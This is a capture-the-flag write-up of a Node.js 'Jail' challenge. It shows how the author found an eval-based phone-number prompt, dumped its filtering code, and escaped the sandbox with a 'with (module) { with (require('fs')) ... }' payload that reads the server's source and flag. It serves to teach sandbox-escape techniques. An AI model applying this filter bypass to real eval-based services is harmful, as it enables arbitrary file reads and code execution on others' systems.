This is an interesting challenge… I through I knew JavaScript before this game but at the end of it I found out that there are still things I can learn.

Question:

Jail – Pwn (200 + 0)

Joey gave you the disk with the file on it and now you’re in jail. They’re charging you with some serious shit, man! Better figure out a way to escape.

Solves: 43

Service: jail.alieni.se:55542

Author: avlidienbrunn

Once I nc to the server, it showed the following screen

jail1_template

I tried to enter some character like 555-4202, it showed the following screen

Phone #> 555-4202
Calling -3647... Nobody picks up!

Cool! It looked like an eval function is used in this program.  But I still didn’t know the programming language.

Next, I tried to enter the following

echo -e '\n12345' | nc jail.alieni.se 55542

Phone #>
Calling undefined... Nobody picks up!

keyword undefined obtained! Which language will return undefined? The first thing came to my mind was JavaScript!

So I tried the following

Phone #> console.log('123');
Dangerous characters detected

Seems there was some filtering function before the program eval the answer. After some trying, I found this

Phone #> this
Calling function call(number) {
        var hangup = process.exit;
        var line = "";

        if(number == 911){
            console.log("Invalid number");
            ask();
            return;
        }

        var flag,Array,Boolean,Date,global,Error,EvalError,Function,Number,Object,RangeError,ReferenceError,String,SyntaxError,TypeError,URIError,decodeURI,decodeURIComponent,encodeURI,encodeURIComponent,isFinite,isNaN,parseFloat,parseInt,ArrayBuffer,Buffer,DTRACE_HTTP_CLIENT_REQUEST,DTRACE_HTTP_CLIENT_RESPONSE,DTRACE_HTTP_SERVER_REQUEST,DTRACE_HTTP_SERVER_RESPONSE,DTRACE_NET_SERVER_CONNECTION,DTRACE_NET_STREAM_END,DataView,Float32Array,Float64Array,Int16Array,Int32Array,Int8Array,Map,Promise,Proxy,Set,Symbol,Uint16Array,Uint32Array,Uint8Array,Uint8ClampedArray,WeakMap,WeakSet,assert,clearImmediate,clearInterval,clearTimeout,escape,events,require,setImmediate,setInterval,setTimeout,stream,unescape,__defineGetter__,__defineSetter__,__lookupGetter__,__lookupSetter__,constructor,hasOwnProperty,isPrototypeOf,propertyIsEnumerable,toLocaleString,toString,valueOf;

        if(new RegExp(/[\[\]\.\\]/).test(number)){
            console.log("Dangerous characters detected");
            hangup();
            return;
        }

        arguments = undefined;

        console.log("Calling "+eval(number)+"... Nobody picks up!");
        hangup();
    }... Nobody picks up!

Ok, the filter function was clear.  The default functions were redefined to undefined by the function scoping feature of JavaScript.  And the ‘[‘,’]’,’.’ were filtered by the RegExp.

So, it ‘seems’ all the function call were blocked.  But, is it real?

At the time I learnt the programming language VBScript at the very first beginning, there was a magic statement called ‘with’.  Thanks to ECMAScript 262, with is also defined in JavaScript!

HAHA, the poc

Phone #> with (module) { with (require('fs')) { readFileSync(__filename) } }
Calling var flag = "SECT{1ts_1n_th4T_pl4Ce_Wh3re_1_Pu7_tH4t_Th1ng_th4T_t1m3,}"
var readline = require('readline');
var rl = readline.createInterface(process.stdin, process.stdout);

var Jail = (function() {
    var rv = {};

    function call(number) {
        var hangup = process.exit;
        var line = "";

        if(number == 911){
            console.log("Invalid number");
            ask();
            return;
        }

        var flag,Array,Boolean,Date,global,Error,EvalError,Function,Number,Object,RangeError,ReferenceError,String,SyntaxError,TypeError,URIError,decodeURI,decodeURIComponent,encodeURI,encodeURIComponent,isFinite,isNaN,parseFloat,parseInt,ArrayBuffer,Buffer,DTRACE_HTTP_CLIENT_REQUEST,DTRACE_HTTP_CLIENT_RESPONSE,DTRACE_HTTP_SERVER_REQUEST,DTRACE_HTTP_SERVER_RESPONSE,DTRACE_NET_SERVER_CONNECTION,DTRACE_NET_STREAM_END,DataView,Float32Array,Float64Array,Int16Array,Int32Array,Int8Array,Map,Promise,Proxy,Set,Symbol,Uint16Array,Uint32Array,Uint8Array,Uint8ClampedArray,WeakMap,WeakSet,assert,clearImmediate,clearInterval,clearTimeout,escape,events,require,setImmediate,setInterval,setTimeout,stream,unescape,__defineGetter__,__defineSetter__,__lookupGetter__,__lookupSetter__,constructor,hasOwnProperty,isPrototypeOf,propertyIsEnumerable,toLocaleString,toString,valueOf;

        if(new RegExp(/[\[\]\.\\]/).test(number)){
            console.log("Dangerous characters detected");
            hangup();
            return;
        }

        arguments = undefined;

        console.log("Calling "+eval(number)+"... Nobody picks up!");
        hangup();
    };
    rv.call = call;
    rv.toString = function(){return rv.call.toString()};

    return rv;
})();

template = `_____________________________
     ||   ||     ||   ||
     ||   ||, , ,||   ||
     ||  (||/|/(\/||/  ||
     ||  ||| _'_´|||  ||
     ||   || o o ||   ||
     ||  (||  - ´||)  ||
     ||   ||  =  ||   ||
     ||   ||\\___/||   ||
     ||___||) , (||___||
    /||---||-\\_/-||---||\\
   / ||--_||_____||_--|| \\
  (_(||)-|S555-4202|-(||)_)
|"""""""""""""""""""""""""""|
| "You get one call, UNO."  |
 """""""""""""""""""""""""""
 Phone #> `;

function ask(){
    rl.question(template,function(answer){
        Jail.call(answer);
    });
}

ask();
... Nobody picks up!

Cheers!